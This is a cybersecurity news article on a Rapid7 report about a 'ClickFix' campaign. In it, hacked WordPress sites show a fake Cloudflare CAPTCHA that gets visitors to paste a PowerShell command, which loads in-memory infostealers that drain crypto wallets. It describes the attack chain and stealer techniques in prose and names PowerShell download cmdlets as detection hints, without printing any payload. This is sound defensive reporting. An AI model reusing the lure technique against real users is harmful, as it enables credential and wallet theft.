The CAPTCHA Trap: How a Global ‘ClickFix’ Campaign Weaponizes WordPress to Drain Digital Wallets
Ddos 
Overview of the attack chain | Image: Rapid7
In a sophisticated new campaign active since late 2025, a mysterious threat actor has been turning the internetβs most basic security toolβthe human verification challengeβinto a gateway for high-stakes financial theft. Rapid7 Labs recently unmasked a widespread operation that compromises legitimate WordPress websites to inject a “ClickFix” implant. This implant impersonates a Cloudflare CAPTCHA to trick users into executing a multi-stage malware chain that ultimately drains digital wallets and steals sensitive credentials.
Researchers have identified more than 250 infected websites spanning at least 12 countries, including the US, UK, Australia, and India. The targets are alarming in their legitimacy, ranging from local business sites and regional news outlets to the official webpage of a United States Senate candidate.
As the report notes:
“This legitimacy, together with the convincing appearance of the fake Cloudflare CAPTCHA lure, makes this threat dangerous for organizations and individuals alike“.
The attack begins when a visitor lands on a compromised WordPress site. The site injects a script that only triggers if the user is not logged into the WordPress admin panelβa clever tactic designed to hide the infection from site owners.
- A fake Cloudflare “Verify you are human” box appears.
- To “verify,” users are instructed to press Win + R, paste a command, and hit enter.
- This command triggers a PowerShell script that retrieves the “DoubleDonut” loaderβa two-stage shellcode engine that operates almost entirely in system memory to evade traditional antivirus software.
The “DoubleDonut” loader acts as a delivery vehicle for various infostealers, which the threat actor has rotated throughout the campaign:
- Vidar Stealer v2: An evolved version of a notorious stealer that now uses encrypted C2 configurations and a “VigenΓ¨re-like” decryption routine to hide its tracks.
- Impure Stealer: A custom .NET malware that uses a server-provided key for AES-256-CBC encryption of its communications, masquerading as members of the PureLogs family.
- VodkaStealer: A new, custom C++ stealer believed to be unique to this campaign. While it lacks the polish of commercial stealers, it employs a “helper binary” known as ChromElevator to bypass Chromeβs latest app-bound encryption.
The shift to a custom tool like VodkaStealer suggests an interesting evolution in the cybercrime economy. Rapid7 researchers speculate that while commercial stealers are expensive, the rise of pre-trained LLMs may be making it easier for attackers to develop their own “proof of concept” malware from scratch.
Despite this technical complexity, the malware maintains a classic “no-go zone”: it terminates immediately if it detects a Russian keyboard layout or an IP address located in Russia or Belarus.
Traditional file-based detection is largely ineffective here because the malware chain is “executed almost entirely in memory and in the context of inconspicuous Windows processes”.
Defenders are urged to:
- Audit WordPress Sites: Ensure no unknown scripts are running via admin-ajax.php.
- Monitor PowerShell: Watch for suspicious outbound Invoke-Expression or Invoke-WebRequest commands.
- Verify CAPTCHAs: Real verification challenges will never ask you to copy and paste commands into your Windows Run dialog.
Support Our Threat Intelligence
If you find our CVE report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
